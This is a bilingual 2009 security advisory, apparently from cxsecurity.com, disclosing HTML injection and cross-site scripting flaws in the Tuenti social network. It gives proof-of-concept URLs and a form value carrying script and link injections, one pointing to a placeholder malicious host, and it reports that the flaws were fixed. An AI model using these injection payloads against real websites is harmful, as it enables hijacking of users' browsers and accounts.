Tuenti - Spain - Multiple Vulns

2009-05-14 / 2009-05-15
Credit: YEnH4ckEr
Risk: Low
Local: No
Remote: Yes
CVE: N/A
CWE: N/A

#################### Language: English #################### ------------------------------------------------------------ MULTIPLE CODE INJECTION VULNERABILITIES --TUENTI--SPAIN--> ------------------------------------------------------------ SYSTEM INFORMATION: -->WEB: http://www.tuenti.com/ -->DOWNLOAD: No there. -->DEMO: N/A -->CATEGORY: Social Networking -->DESCRIPTION: Tuenti is the biggest and most popular social network in Spain. SYSTEM VULNERABILITY: -->TESTED ON: firefox 3 and Internet Explorer 6.0 -->CATEGORY: HTML CODE INJECTION / XSS -->Discovered Bug date: 2009-05-04 -->Reported Bug date: 2009-05-04 -->Fixed bug date: 2009-05-12 -->Author: YEnH4ckEr -->mail: y3nh4ck3r[at]gmail[dot]com -->WEB/BLOG: N/A -->COMMENT: A mi novia Marijose...hermano,cunyada, padres (y amigos xD) por su apoyo. -->EXTRA-COMMENT: Xikitiya no me odies por esto jajaja ################# ///////////////// HTML INJECTION: ///////////////// ################# Go to --> http://www.tuenti.com/#m=video&video_id=697&cat_id=tuentiVideos Vuln GET var --> 'cat_id' Note: Here was not possible a XSS attack ------------------ PROOF OF CONCEPT: ------------------ http://www.tuenti.com/#m=video&video_id=697&cat_id=tuentiVideos"><A HREF=http://[MALICIOUS-HOST]/[PATH]/index.php>y3nh4ck3r was here!</A> Return --> New link on footer ############################# ///////////////////////////// CROSS SITE SCRIPTING (XSS): ///////////////////////////// ############################# <<<<---------++++++++++++++ Condition: Be registered user +++++++++++++++++--------->>>> <<<<---------++++++++++++++ Extra-Condition: Be friends (victim/attacker) +++++++++++++++++--------->>>> Go to --> http://www.tuenti.com/#m=editfoto&upload=1&items=2-64699031-503405997-64699031 Vuln GET var --> 'items' ------------------ PROOF OF CONCEPT: ------------------ http://www.tuenti.com/#m=editfoto&upload=1&items=2-64699031-503405997-64699031"><script>alert('y3nh4ck3r was here')</script> Return --> Alert message <<<<---------++++++++++++++ Condition: Be registered user +++++++++++++++++--------->>>> <<<<---------++++++++++++++ Extra-Condition: Nothing +++++++++++++++++--------->>>> Go to --> http://www.tuenti.com/#m=videos&view=category&cat_id=upload Vuln GET var --> 'cat_id' ------------------ PROOF OF CONCEPT: ------------------ http://www.tuenti.com/#m=videos&view=category&cat_id=upload"><script>alert(String.fromCharCode(121,51,110,104,52,99,107,51,114,32,119,97,115,32,104,101,114,101,33))</script> Return --> Alert message <<<<---------++++++++++++++ Condition: Nothing +++++++++++++++++--------->>>> <<<<---------++++++++++++++ Extra-Condition: Nothing +++++++++++++++++--------->>>> Go to --> http://www.tuenti.com/?need_invite=1 Vuln POST var --> 'email' ------------------ PROOF OF CONCEPT: ------------------ email="><script>alert(String.fromCharCode(121,51,110,104,52,99,107,51,114,32,119,97,115,32,104,101,114,101,33))</script> Return --> Alert message ---------------- FINAL REMARK: ---------------- Staff's members have fixed successfully these vulnerabilites ;) #################### Language: Spanish #################### ---------------------------------------------------------------------- MLTIPLES VULNERABILIDADES DE INYECCIN DE CDIGO --TUENTI--ESPA&#209;A-> ---------------------------------------------------------------------- INFORMACIN DEL SISTEMA: -->WEB: http://www.tuenti.com/ -->DESCARGA: No hay -->DEMO: No disponible -->CATEGORA: Red social -->DESCRIPCIN: Tuenti es la mayor y ms popular red social en Espa&#241;a. VULNERABILIDAD DEL SISTEMA: -->PROBADO EN: firefox 3 y Internet Explorer 6.0 -->CATEGORA: INYECCIN DE CDIGO HTML/ XSS. -->Fecha de descubrimiento del bug: 2009-05-04 -->Fecha de aviso al sistema: 2009-05-04 -->Fecha de fijacin del bug: 2009-05-12 -->Autor: YEnH4ckEr -->Correo: y3nh4ck3r[at]gmail[dot]com -->WEB/BLOG: No disponible -->Comentario: A mi novia Marijose...hermano,cunyada, padres (y amigos xD) por su apoyo. -->Comentario-extra: Xikitiya no me odies por esto jajaja ################# ///////////////// INYECCIN HTML: ///////////////// ################# Ir a --> http://www.tuenti.com/#m=video&video_id=697&cat_id=tuentiVideos Variable GET vulnerable --> 'cat_id' Nota: Aqu no fue posible un ataque XSS ------------------- PRUEBA DE CONCEPTO: ------------------- http://www.tuenti.com/#m=video&video_id=697&cat_id=tuentiVideos"><A HREF=http://[MALICIOUS-HOST]/[PATH]/index.php>y3nh4ck3r was here!</A> Devuelve --> Nuevo enlace en el pie de pgina ############################# ///////////////////////////// CROSS SITE SCRIPTING (XSS): ///////////////////////////// ############################# <<<<---------++++++++++++++ Condicin: Ser usuario registrado +++++++++++++++++--------->>>> <<<<---------++++++++++++++ Condicin-extra: Ser amigos (vctima/atacante) +++++++++++++++++--------->>>> Ir a --> http://www.tuenti.com/#m=editfoto&upload=1&items=2-64699031-503405997-64699031 Variable GET vulnerable --> 'items' ------------------- PRUEBA DE CONCEPTO: ------------------- http://www.tuenti.com/#m=editfoto&upload=1&items=2-64699031-503405997-64699031"><script>alert('y3nh4ck3r was here')</script> Devuelve --> Mensaje de alerta <<<<---------++++++++++++++ Condicin: Ser usuario registrado +++++++++++++++++--------->>>> <<<<---------++++++++++++++ Condicin-extra: Nada +++++++++++++++++--------->>>> Ir a --> http://www.tuenti.com/#m=videos&view=category&cat_id=upload Variable GET vulnerable --> 'cat_id' ------------------- PRUEBA DE CONCEPTO: ------------------- http://www.tuenti.com/#m=videos&view=category&cat_id=upload"><script>alert(String.fromCharCode(121,51,110,104,52,99,107,51,114,32,119,97,115,32,104,101,114,101,33))</script> Devuelve --> Mensaje de alerta <<<<---------++++++++++++++ Condicin: Nada +++++++++++++++++--------->>>> <<<<---------++++++++++++++ Condicin-extra: Nada +++++++++++++++++--------->>>> Ir a --> http://www.tuenti.com/?need_invite=1 Variable POST vulnerable --> 'email' ------------------- PRUEBA DE CONCEPTO: ------------------- email="><script>alert(String.fromCharCode(121,51,110,104,52,99,107,51,114,32,119,97,115,32,104,101,114,101,33))</script> Devuelve --> Mensaje de alerta ------------------- OBSERVACIN FINAL: ------------------- El equipo de trabajo ha fijado con xito estas vulnerabilidades ;) ####################################################################### ####################################################################### ##*******************************************************************## ## SPECIAL GREETZ TO: Str0ke, JosS, Ulises2k, J. McCray ... ## ##*******************************************************************## ##-------------------------------------------------------------------## ##*******************************************************************## ## GREETZ TO: SPANISH H4ck3Rs community! ## ##*******************************************************************## ####################################################################### #######################################################################

References:

http://seclists.org/bugtraq/2009/May/0147.html


See this note in RAW Version
Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}
Copyright 2024, cxsecurity.com

 

Back to Top